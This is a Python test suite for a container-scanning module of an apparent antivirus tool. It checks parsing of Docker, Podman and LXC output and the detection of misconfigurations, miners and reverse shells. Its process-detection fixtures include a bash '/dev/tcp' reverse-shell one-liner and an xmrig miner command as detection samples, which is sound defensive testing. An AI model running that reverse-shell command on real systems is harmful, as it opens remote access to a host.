"""Tests for the container scanner module."""

from __future__ import annotations
|
|
|
|
import json
|
|
from unittest.mock import patch
|
|
|
|
import pytest
|
|
|
|
from ayn_antivirus.scanners.container_scanner import (
|
|
ContainerInfo,
|
|
ContainerScanResult,
|
|
ContainerScanner,
|
|
ContainerThreat,
|
|
)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------

class TestContainerInfo:
    """Checks for the ``ContainerInfo`` data class."""

    def test_defaults(self):
        """Optional fields fall back to empty / zero values when omitted."""
        required = {
            "container_id": "abc",
            "name": "web",
            "image": "nginx",
            "status": "running",
            "runtime": "docker",
            "created": "2026-01-01",
        }
        info = ContainerInfo(**required)

        assert info.ports == []
        assert info.mounts == []
        assert info.pid == 0
        assert info.ip_address == ""
        assert info.labels == {}

    def test_to_dict(self):
        """``to_dict`` carries the id, ports and labels through unchanged."""
        fields = {
            "container_id": "abc",
            "name": "web",
            "image": "nginx:1.25",
            "status": "running",
            "runtime": "docker",
            "created": "2026-01-01",
            "ports": ["80:80"],
            "mounts": ["/data"],
            "pid": 42,
            "ip_address": "10.0.0.2",
            "labels": {"env": "prod"},
        }
        as_dict = ContainerInfo(**fields).to_dict()

        assert as_dict["container_id"] == "abc"
        assert as_dict["ports"] == ["80:80"]
        assert as_dict["labels"] == {"env": "prod"}


class TestContainerThreat:
    """Checks for the ``ContainerThreat`` data class."""

    def test_to_dict(self):
        """``to_dict`` exposes the name, severity and a 19-character timestamp."""
        threat = ContainerThreat(
            container_id="abc",
            container_name="web",
            runtime="docker",
            threat_name="Miner.X",
            threat_type="miner",
            severity="CRITICAL",
            details="found xmrig",
        )
        as_dict = threat.to_dict()

        assert as_dict["threat_name"] == "Miner.X"
        assert as_dict["severity"] == "CRITICAL"
        assert len(as_dict["timestamp"]) == 19

    def test_optional_fields(self):
        """``file_path`` and ``process_name`` appear in the dict when supplied."""
        threat = ContainerThreat(
            container_id="x",
            container_name="y",
            runtime="podman",
            threat_name="T",
            threat_type="malware",
            severity="HIGH",
            details="d",
            file_path="/tmp/bad",
            process_name="evil",
        )
        as_dict = threat.to_dict()

        assert as_dict["file_path"] == "/tmp/bad"
        assert as_dict["process_name"] == "evil"


class TestContainerScanResult:
    """Checks for the ``ContainerScanResult`` data class."""

    def test_empty_is_clean(self):
        """A result with no threats and no end time is clean with zero duration."""
        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
        )

        assert result.is_clean is True
        assert result.duration_seconds == 0.0

    def test_with_threats(self):
        """One threat makes the result unclean; duration is end minus start."""
        threat = ContainerThreat(
            container_id="a",
            container_name="b",
            runtime="docker",
            threat_name="T",
            threat_type="miner",
            severity="HIGH",
            details="d",
        )
        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
            end_time="2026-01-01 00:00:10",
            threats=[threat],
        )

        assert result.is_clean is False
        assert result.duration_seconds == 10.0

    def test_to_dict(self):
        """``to_dict`` reports the threat count, duration and recorded errors."""
        result = ContainerScanResult(
            scan_id="t",
            start_time="2026-01-01 00:00:00",
            end_time="2026-01-01 00:00:03",
            containers_found=2,
            containers_scanned=1,
            errors=["oops"],
        )
        as_dict = result.to_dict()

        assert as_dict["threats_found"] == 0
        assert as_dict["duration_seconds"] == 3.0
        assert as_dict["errors"] == ["oops"]


# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------

class TestContainerScanner:
    """Checks for ``ContainerScanner`` and its command helpers."""

    def test_properties(self):
        """Name, description and runtime list have the expected shape."""
        scanner = ContainerScanner()

        assert scanner.name == "container_scanner"
        assert "Docker" in scanner.description
        assert isinstance(scanner.available_runtimes, list)

    def test_no_runtimes_graceful(self):
        """With no runtimes installed scan returns an error, not an exception."""
        scanner = ContainerScanner()
        # Force the "nothing installed" state regardless of the host.
        scanner._available_runtimes = []
        for cmd_attr in ("_docker_cmd", "_podman_cmd", "_lxc_cmd"):
            setattr(scanner, cmd_attr, None)

        result = scanner.scan("all")

        assert isinstance(result, ContainerScanResult)
        assert result.containers_found == 0
        assert len(result.errors) == 1
        assert "No container runtimes" in result.errors[0]

    def test_scan_returns_result(self):
        """``scan`` yields a result with id, start time and end time set."""
        result = ContainerScanner().scan("all")

        assert isinstance(result, ContainerScanResult)
        assert result.scan_id
        assert result.start_time
        assert result.end_time

    def test_scan_container_delegates(self):
        """``scan_container`` returns a scan result even with no runtimes."""
        scanner = ContainerScanner()
        scanner._available_runtimes = []

        result = scanner.scan_container("some-id")

        assert isinstance(result, ContainerScanResult)

    def test_run_cmd_timeout(self):
        """A command outliving the timeout gives rc -1 and a 'timed out' message."""
        outcome = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
        _, stderr, rc = outcome

        assert rc == -1
        assert "timed out" in stderr.lower()

    def test_run_cmd_not_found(self):
        """A missing binary gives rc -1 and a not-found style message."""
        missing = ["this_command_does_not_exist_xyz"]
        _, stderr, rc = ContainerScanner._run_cmd(missing)

        assert rc == -1
        says_not_found = "not found" in stderr.lower()
        says_no_such_file = "No such file" in stderr
        assert says_not_found or says_no_such_file

    def test_find_command(self):
        """Known binaries resolve; unknown ones give ``None``."""
        # python3 should exist everywhere
        found = ContainerScanner._find_command("python3")
        assert found is not None

        absent = ContainerScanner._find_command("no_such_binary_xyz")
        assert absent is None


# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------

class TestDockerParsing:
    """Test Docker output parsing with mocked subprocess calls."""

    def _make_scanner(self):
        """Return a scanner configured as if only Docker were installed."""
        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        scanner._available_runtimes = ["docker"]
        return scanner

    def test_list_docker_parses_output(self):
        """One ``docker ps`` row plus its inspect data become one ContainerInfo."""
        # Tab-separated columns of a single ``docker ps`` row.
        ps_line = "\t".join([
            "abc123456789",
            "web",
            "nginx:1.25",
            "Up 2 hours",
            "2026-01-01 00:00:00",
            "0.0.0.0:80->80/tcp",
        ])
        inspect_json = json.dumps([
            {
                "State": {"Pid": 42},
                "NetworkSettings": {
                    "Networks": {"bridge": {"IPAddress": "172.17.0.2"}},
                },
                "Mounts": [{"Source": "/data"}],
                "Config": {"Labels": {"app": "web"}},
            },
        ])
        # First reply answers ``docker ps``, second answers ``docker inspect``.
        replies = [
            (ps_line, "", 0),
            (inspect_json, "", 0),
        ]
        scanner = self._make_scanner()

        with patch.object(scanner, "_run_cmd", side_effect=replies):
            found = scanner._list_docker()

        assert len(found) == 1
        container = found[0]
        assert container.name == "web"
        assert container.image == "nginx:1.25"
        assert container.status == "running"
        assert container.runtime == "docker"
        assert container.pid == 42
        assert container.ip_address == "172.17.0.2"
        assert "/data" in container.mounts
        assert container.labels == {"app": "web"}

    def test_list_docker_ps_failure(self):
        """A failing ``docker ps`` produces an empty container list."""
        scanner = self._make_scanner()
        failed = ("", "error", 1)

        with patch.object(scanner, "_run_cmd", return_value=failed):
            assert scanner._list_docker() == []

    def test_inspect_docker_bad_json(self):
        """Unparseable inspect output produces an empty dict."""
        scanner = self._make_scanner()
        garbage = ("not json", "", 0)

        with patch.object(scanner, "_run_cmd", return_value=garbage):
            assert scanner._inspect_docker("abc") == {}


class TestPodmanParsing:
    """Test Podman JSON parsing with a mocked subprocess call."""

    def test_list_podman_parses_json(self):
        """A single JSON entry from Podman becomes one ContainerInfo."""
        scanner = ContainerScanner()
        scanner._podman_cmd = "/usr/bin/podman"
        scanner._available_runtimes = ["podman"]

        entry = {
            "Id": "def456789012abcdef",
            "Names": ["db"],
            "Image": "postgres:16",
            "State": "running",
            "Created": "2026-01-01",
            "Ports": [{"hostPort": 5432, "containerPort": 5432}],
            "Pid": 99,
            "Labels": {},
        }
        reply = (json.dumps([entry]), "", 0)

        with patch.object(scanner, "_run_cmd", return_value=reply):
            found = scanner._list_podman()

        assert len(found) == 1
        first = found[0]
        assert first.name == "db"
        assert first.runtime == "podman"
        assert first.pid == 99


class TestLXCParsing:
    """Test LXC listing output parsing with a mocked subprocess call."""

    def test_list_lxc_parses_output(self):
        """A header row plus one data row becomes one ContainerInfo."""
        scanner = ContainerScanner()
        scanner._lxc_cmd = "/usr/bin/lxc-ls"
        scanner._available_runtimes = ["lxc"]

        listing = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
        reply = (listing, "", 0)

        with patch.object(scanner, "_run_cmd", return_value=reply):
            found = scanner._list_lxc()

        assert len(found) == 1
        first = found[0]
        assert first.name == "test1"
        assert first.status == "running"
        assert first.ip_address == "10.0.3.5"
        assert first.pid == 1234


class TestMisconfigDetection:
    """Test misconfiguration detection with mocked inspect output."""

    def _scan_misconfig(self, inspect_data):
        """Run ``_check_misconfigurations`` against *inspect_data*.

        ``_run_cmd`` is patched to return *inspect_data* wrapped in a
        one-element JSON list with empty stderr and exit code 0.
        """
        inspect_reply = (json.dumps([inspect_data]), "", 0)

        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        target = ContainerInfo(
            container_id="abc",
            name="test",
            image="img",
            status="running",
            runtime="docker",
            created="",
        )
        with patch.object(scanner, "_run_cmd", return_value=inspect_reply):
            return scanner._check_misconfigurations(target)

    def _threat_names(self, inspect_data):
        """Return the ``threat_name`` of every threat found for *inspect_data*."""
        return [
            threat.threat_name
            for threat in self._scan_misconfig(inspect_data)
        ]

    def test_privileged_mode(self):
        """``Privileged: True`` is reported."""
        found = self._threat_names({
            "HostConfig": {"Privileged": True},
            "Config": {"User": "app"},
        })
        assert "PrivilegedMode.Container" in found

    def test_root_user(self):
        """An empty ``User`` is reported as running as root."""
        found = self._threat_names({
            "HostConfig": {},
            "Config": {"User": ""},
        })
        assert "RunAsRoot.Container" in found

    def test_host_network(self):
        """``NetworkMode: host`` is reported."""
        found = self._threat_names({
            "HostConfig": {"NetworkMode": "host"},
            "Config": {"User": "app"},
        })
        assert "HostNetwork.Container" in found

    def test_host_pid(self):
        """``PidMode: host`` is reported."""
        found = self._threat_names({
            "HostConfig": {"PidMode": "host"},
            "Config": {"User": "app"},
        })
        assert "HostPID.Container" in found

    def test_dangerous_caps(self):
        """Each added dangerous capability gets its own threat name."""
        found = self._threat_names({
            "HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
            "Config": {"User": "app"},
        })
        assert "DangerousCap.Container.SYS_ADMIN" in found
        assert "DangerousCap.Container.NET_RAW" in found

    def test_sensitive_mount(self):
        """Mounting the Docker socket is reported as a sensitive mount."""
        docker_sock = "/var/run/docker.sock"
        found = self._threat_names({
            "HostConfig": {},
            "Config": {"User": "app"},
            "Mounts": [{"Source": docker_sock, "Destination": docker_sock}],
        })
        assert "SensitiveMount.Container" in found

    def test_no_resource_limits(self):
        """Zero memory and CPU quota are reported as missing limits."""
        found = self._threat_names({
            "HostConfig": {"Memory": 0, "CpuQuota": 0},
            "Config": {"User": "app"},
        })
        assert "NoResourceLimits.Container" in found

    def test_security_disabled(self):
        """An unconfined seccomp profile is reported."""
        found = self._threat_names({
            "HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
            "Config": {"User": "app"},
        })
        assert "SecurityDisabled.Container" in found

    def test_clean_config(self):
        """A non-root user with resource limits set yields no threats."""
        clean = {
            "HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
            "Config": {"User": "app"},
        }
        threats = self._scan_misconfig(clean)
        # Should have no misconfig threats
        assert len(threats) == 0


class TestImageCheck:
    """Test image tag checks performed by ``ContainerScanner._check_image``."""

    @staticmethod
    def _image_threats(image):
        """Run ``_check_image`` on a running Docker container using *image*."""
        container = ContainerInfo(
            container_id="a",
            name="b",
            image=image,
            status="running",
            runtime="docker",
            created="",
        )
        return ContainerScanner._check_image(container)

    def test_latest_tag(self):
        """An explicit ``:latest`` tag is flagged."""
        threats = self._image_threats("nginx:latest")
        assert any("LatestTag" in threat.threat_name for threat in threats)

    def test_no_tag(self):
        """An image with no tag at all is flagged the same way."""
        threats = self._image_threats("nginx")
        assert any("LatestTag" in threat.threat_name for threat in threats)

    def test_pinned_tag(self):
        """A pinned version tag produces no threats."""
        threats = self._image_threats("nginx:1.25.3")
        assert len(threats) == 0


class TestProcessDetection:
    """Test suspicious-process detection with mocked process listings."""

    # Column header shared by the fake process listings below.
    _PS_HEADER = "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"

    def _make_scanner_and_container(self):
        """Return a Docker-configured scanner and a running container."""
        scanner = ContainerScanner()
        scanner._docker_cmd = "/usr/bin/docker"
        container = ContainerInfo(
            container_id="abc",
            name="test",
            image="img",
            status="running",
            runtime="docker",
            created="",
        )
        return scanner, container

    def _names_for_listing(self, process_row):
        """Return threat names reported for the header plus *process_row*."""
        scanner, container = self._make_scanner_and_container()
        reply = (self._PS_HEADER + process_row, "", 0)
        with patch.object(scanner, "_run_cmd", return_value=reply):
            threats = scanner._check_processes(container)
        return [threat.threat_name for threat in threats]

    def test_miner_detected(self):
        """An ``xmrig`` command line is reported as a crypto miner."""
        names = self._names_for_listing(
            "root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
        )
        assert any("CryptoMiner" in name for name in names)

    def test_reverse_shell_detected(self):
        """A bash ``/dev/tcp`` redirect is reported as a reverse shell."""
        names = self._names_for_listing(
            "root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
        )
        assert any("ReverseShell" in name for name in names)

    def test_stopped_container_skipped(self):
        """A stopped container yields no process threats."""
        scanner, container = self._make_scanner_and_container()
        container.status = "stopped"
        # _get_exec_prefix returns None for stopped containers
        assert scanner._check_processes(container) == []